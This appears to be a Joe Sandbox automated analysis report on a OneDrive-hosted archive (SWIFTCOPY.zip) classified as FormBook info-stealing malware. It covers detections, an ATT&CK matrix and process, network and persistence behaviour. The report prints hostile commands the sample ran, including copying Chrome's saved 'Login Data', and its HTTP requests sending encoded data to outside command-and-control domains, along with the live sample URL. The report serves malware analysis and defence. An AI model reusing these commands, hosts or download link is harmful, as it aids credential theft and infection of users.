Loading ...

Play interactive tourEdit tour

Analysis Report https://onedrive.live.com/download?cid=3447601AB357F8C1&resid=3447601AB357F8C1%21113&authkey=APBubBSchh7xEpo

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:225598
Start date:27.04.2020
Start time:16:30:32
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:browseurl.jbs
Sample URL:https://onedrive.live.com/download?cid=3447601AB357F8C1&resid=3447601AB357F8C1%21113&authkey=APBubBSchh7xEpo
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:21
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • EGA enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.evad.win@27/21@8/2
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, ielowutil.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 23.77.210.216, 13.107.42.13, 13.107.42.12, 152.199.19.161, 205.185.216.10, 205.185.216.42, 2.18.68.82
  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, ie9comview.vo.msecnd.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, l-0004.l-msedge.net, iecvlist.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, go.microsoft.com, l-0003.l-msedge.net, go.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand-Line Interface2Registry Run Keys / Startup Folder1Process Injection512Masquerading1Credential Dumping1Virtualization/Sandbox Evasion3Remote File Copy3Email Collection1Data CompressedRemote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExecution through Module Load1Port MonitorsAccessibility FeaturesSoftware Packing2Input Capture1Process Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumStandard Non-Application Layer Protocol4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExploitation for Client Execution11Accessibility FeaturesPath InterceptionDisabling Security Tools1Input CaptureSecurity Software Discovery211Windows Remote ManagementMan in the Browser1Automated ExfiltrationStandard Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseGraphical User Interface1System FirmwareDLL Search Order HijackingVirtualization/Sandbox Evasion3Credentials in FilesRemote System Discovery1Logon ScriptsData from Local System1Data EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessProcess Injection512Account ManipulationFile and Directory Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information1Brute ForceSystem Information Discovery13Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\G7nl84b3\zx4pbev1pyv_h.exeVirustotal: Detection: 38%Perma Link
Source: C:\Users\user\AppData\Local\Temp\G7nl84b3\zx4pbev1pyv_h.exeReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeVirustotal: Detection: 38%Perma Link
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeReversingLabs: Detection: 41%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\G7nl84b3\zx4pbev1pyv_h.exeJoe Sandbox ML: detected

Software Vulnerabilities:

barindex
Potential browser exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\unarchiver.exeJump to behavior

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /jh8/?b4n8y=VX8P68WEHAq6tLLijdRoafFf7hWQqC2wXmINk69EIOzGZL0CgbaAV1it+uSyYclK2qrX&FB=GrD0f HTTP/1.1Host: www.dangchelan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /jh8/?FB=GrD0f&b4n8y=Xibe6pgUDFnjBMPll5i5Z3A4BeCP4PPOtOBanROLhktMABG+y4XBLsbi2mGFug7mx+8R HTTP/1.1Host: www.dealspiper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /jh8/?b4n8y=VX8P68WEHAq6tLLijdRoafFf7hWQqC2wXmINk69EIOzGZL0CgbaAV1it+uSyYclK2qrX&FB=GrD0f HTTP/1.1Host: www.dangchelan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /jh8/?FB=GrD0f&b4n8y=Xibe6pgUDFnjBMPll5i5Z3A4BeCP4PPOtOBanROLhktMABG+y4XBLsbi2mGFug7mx+8R HTTP/1.1Host: www.dealspiper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: onedrive.live.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /jh8/ HTTP/1.1Host: www.dealspiper.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.dealspiper.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dealspiper.com/jh8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 34 6e 38 79 3d 66 41 58 6b 6b 4f 52 32 48 67 43 68 56 72 65 38 34 63 62 51 47 41 63 67 44 74 76 62 37 76 4b 4b 7a 4c 74 66 79 77 4b 73 78 42 74 55 58 53 54 75 67 64 6d 6b 45 49 61 46 70 46 71 45 75 31 50 50 34 2d 68 65 32 56 4a 4e 75 56 61 74 4f 6d 51 73 73 7a 4e 61 6e 49 4b 2d 44 49 4d 78 4c 70 66 32 74 63 54 59 7e 71 68 52 44 48 4d 4d 68 6d 52 30 4a 59 46 4d 33 6b 46 70 53 4d 57 39 30 53 73 48 50 42 69 38 78 44 28 59 37 43 39 78 4b 41 5a 37 65 76 73 6c 72 55 34 6d 75 4f 44 74 7a 44 38 43 4d 4b 4c 31 58 56 36 6c 75 6f 46 75 6a 66 4c 73 48 6b 6b 31 6c 4a 68 34 63 43 30 50 46 4a 4f 34 6d 4b 7a 2d 36 6a 59 6d 31 46 51 4e 45 79 4a 68 4d 4b 4d 4f 49 30 6d 44 69 62 4b 6c 33 41 4e 43 71 75 79 6e 5a 46 6d 55 37 33 39 44 7a 63 6e 71 6d 6c 6c 6c 4a 4f 65 4b 53 4f 47 48 69 56 76 56 65 44 58 77 6f 7a 66 68 53 6c 48 62 68 6b 4e 32 6c 4a 6a 45 43 69 38 7a 65 36 4a 55 4e 35 76 45 74 36 38 68 49 65 61 58 4f 63 79 39 54 32 63 5f 79 69 6b 39 57 37 62 69 78 62 70 2d 4f 39 30 73 35 74 58 5f 72 4c 64 35 7e 50 6c 33 70 6d 5a 44 32 35 5a 30 55 70 58 5f 50 41 58 6b 38 7a 39 52 45 5f 49 47 68 42 7a 79 4e 42 7e 31 45 6a 54 5a 37 2d 44 62 44 67 70 73 37 32 49 70 4f 4a 6f 65 32 69 53 70 4e 74 57 61 4a 5f 77 37 77 56 73 32 6f 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: b4n8y=fAXkkOR2HgChVre84cbQGAcgDtvb7vKKzLtfywKsxBtUXSTugdmkEIaFpFqEu1PP4-he2VJNuVatOmQsszNanIK-DIMxLpf2tcTY~qhRDHMMhmR0JYFM3kFpSMW90SsHPBi8xD(Y7C9xKAZ7evslrU4muODtzD8CMKL1XV6luoFujfLsHkk1lJh4cC0PFJO4mKz-6jYm1FQNEyJhMKMOI0mDibKl3ANCquynZFmU739DzcnqmlllJOeKSOGHiVvVeDXwozfhSlHbhkN2lJjECi8ze6JUN5vEt68hIeaXOcy9T2c_yik9W7bixbp-O90s5tX_rLd5~Pl3pmZD25Z0UpX_PAXk8z9RE_IGhBzyNB~1EjTZ7-DbDgps72IpOJoe2iSpNtWaJ_w7wVs2oQ).
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 27 Apr 2020 14:32:26 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
Urls found in memory or binary dataShow sources
Source: explorer.exeString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
Source: explorer.exeString found in binary or memory: http://ns.adob
Source: explorer.exeString found in binary or memory: http://ns.microsoft
Source: explorer.exeString found in binary or memory: http://www.%s.com
Source: cmstp.exeString found in binary or memory: http://www.msn.com/
Source: cmstp.exeString found in binary or memory: http://www.msn.com/de-ch/
Source: cmstp.exeString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: cmstp.exeString found in binary or memory: https://gemihq.dm.files.1drv.com/y4mtf0iBMjW4AqPxlsG5R09UA2Sv7gGrULcn39ef3NlGT0SjM_ogtGyu9cLoFCaUVqw
Source: cmstp.exeString found in binary or memory: https://www.msn.com/content/images/icons/Favicon_EdgeStart.ico
Source: cmstp.exeString found in binary or memory: https://www.msn.com/spartan/ientp
Source: cmstp.exeString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: SWIFTCOPY.exeBinary or memory string: "<HOOK MODULE='DDRAW.DLL' FUNCTION='DirectDrawCreateEx'/>"

System Summary:

barindex
Detected FormBook malwareShow sources
Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\23OP2RPA\23Ologri.iniJump to dropped file
Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\23OP2RPA\23Ologrf.iniJump to dropped file
Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\23OP2RPA\23Ologrv.iniJump to dropped file
PE file contains strange resourcesShow sources
Source: SWIFTCOPY.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zx4pbev1pyv_h.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\cmstp.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Uses a Windows Living Off The Land Binaries (LOL bins)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: SWIFTCOPY.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: zx4pbev1pyv_h.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification labelShow sources
Source: classification engineClassification label: mal100.spyw.evad.win@27/21@8/2
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B7FD0DBA-8893-11EA-AAE6-9CC1A2A860C6}.datJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2880:120:WilError_01
Creates temporary filesShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFB169AA6D356022FB.TMPJump to behavior
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample might require command line argumentsShow sources
Source: 7za.exeString found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0
Source: unarchiver.exeString found in binary or memory: -install
Source: SWIFTCOPY.exeString found in binary or memory: "/k certutil.exe -f -enterprise -v -addstore Root '%s'"
Source: SWIFTCOPY.exeString found in binary or memory: "The device has succeeded a query-stop and its resource requirements have changed."
Source: explorer.exeString found in binary or memory: /launcher/view/group
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5032 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Windows\SysWOW64\unarchiver.exe 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'
Source: unknownProcess created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe
Source: unknownProcess created: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5032 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeProcess created: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\cmstp.exeFile written: C:\Users\user\AppData\Roaming\23OP2RPA\23Ologri.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\cmstp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: cmmon32.pdb source: zx4pbev1pyv_h.exe
Source: Binary string: wntdll.pdb source: SWIFTCOPY.exe
Source: Binary string: cmstp.pdb source: SWIFTCOPY.exe

Data Obfuscation:

barindex
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 7.88071807995
Source: initial sampleStatic PE information: section name: .text entropy: 7.88071807995

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\G7nl84b3\zx4pbev1pyv_h.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeJump to dropped file

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\cmstp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VHSDVLYPNDJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VHSDVLYPNDJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
